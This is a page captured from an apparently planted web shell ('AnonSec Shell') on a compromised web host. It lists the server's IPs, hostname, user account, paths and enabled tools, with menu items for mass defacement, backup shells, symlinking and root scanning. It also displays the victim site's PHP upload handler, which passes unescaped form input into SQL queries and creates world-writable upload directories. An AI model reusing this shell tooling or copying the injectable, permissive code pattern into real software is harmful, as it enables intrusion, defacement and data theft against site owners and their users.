AnonSec Shell
Server IP : 172.67.216.113  /  Your IP : 172.71.28.146   [ Reverse IP ]
Web Server : Apache
System : Linux cpanel01wh.bkk1.cloud.z.com 2.6.32-954.3.5.lve1.4.59.el6.x86_64 #1 SMP Thu Dec 6 05:11:00 EST 2018 x86_64
User : cp648411 ( 1354)
PHP Version : 7.2.34
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home2/cp648411/public_html/ilawasia.onnud20.com/Attachment/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /home2/cp648411/public_html/ilawasia.onnud20.com/Attachment/action.php
<?php
$ck='not';
include("../include/checkLogin.php");
include("../include/class.php");
include("../include/table_name.php");
$date_year = date("Y");
$date_month = date("m");
require_once("../class/coreClass.php");
$core_db = new coreClass;

if($_POST['Type']=='Create'){
  if(@$_POST["ParentId"]==''){$AttachmentNumber = $core_db->GenDocumentNumberOnlyYear($GenDoc);}
  if($_POST["ParentId"]!=''){

    $sql_Attac = array('table'=>$name_table,'where'=>"ParentId = '".@$_POST["ParentId"]."'");
    $view_sql_Attac = $view_db->view($sql_Attac);
    $row_Attac = $view_db->q($view_sql_Attac);
  }


  if($_FILES["File"]["error"] == 0)
  {
    $path = "../Upload/";
    $subPath = "Attachment/".@$AttachmentNumber['gdn']."/";
    $Directory = $path . $subPath;
    if (!file_exists($Directory)) {mkdir($Directory, 0777, true);}
    $name_file = $image_class->file_up($_FILES["File"],$Directory,$subPath);
  //  @unlink($path.$name_file);
  }

  //$AttachmentNumber=@$_POST["ParentId"];
  $caseId='';$customerId='';
  if($_POST['CaseNumber']!=''){
    $sql_case = array('table'=>$name_table2,'where'=>"CaseNumber = '".@$_POST["CaseNumber"]."'");
    $view_sql_case = $view_db->view($sql_case);
    $row_case = $view_db->q($view_sql_case);
  }
  $GenDoc=2;
  //echo $subPath.$name_file;

  $list = array(
    'table'=>$name_table,
    'AttachmentNumber'=>"'".$AttachmentNumber['gdn2']."'",
    'Seq'=>"'".(@$_POST["ParentId"]=='')?0:""."'",
    'ParentId'=>"'".@$_POST["ParentId"]."'",
    'DocumentType'=>"'".@$_POST["DocumentType"]."'",
    'DocumentDate'=>"'".@$date."'",
    'DocumentName'=>"'".@$_POST["DocumentName"]."'",
    'AttachmentDate'=>"'".@$date."'",
    'FilePath'=>"'".@$name_file."'",
    'CaseId'=>"'".@$_POST["Status"]."'",
    'CustomerId'=>"'".@$_POST["Status"]."'",
    'CreateBy'=>"'".@$_POST["Status"]."'",
    'CreateDateTime'=>"'".@$_POST["Status"]."'",
    'UpdateBy'=>"'".@$_SESSION["UserInfo"][0]['UserId']."'",
    'UpdateDateTime'=>"'".@$date."'"
  );
  /*
  echo "<pre>";
  print_r($list);
  echo "</pre>";
  exit();
  */
  $add = $actiondata_db->add_db($list);
  if($add['suc']==1){
    $list = array(
      'table'=>$name_table11,
      'DocumentNumberId'=>$GenDoc,
      'Year'=>$AttachmentNumber['date_year'],
      'Month'=>$AttachmentNumber['date_month'],
      'Number'=>$AttachmentNumber['running']
    );
    $add = $actiondata_db->edit_db($list);

    $_SESSION['Success']='Update payment terms successful';
    echo "<script>window.location.href='index.php'</script>";
  }else{
    $_SESSION['er']='false';
    echo "<script>window.location.href='index.php</script>";
  }

}
if($_POST['Type']=='Edit'){}
if($_POST['Type']=='Del'){}

?>

Anon7 - 2022
AnonSec Team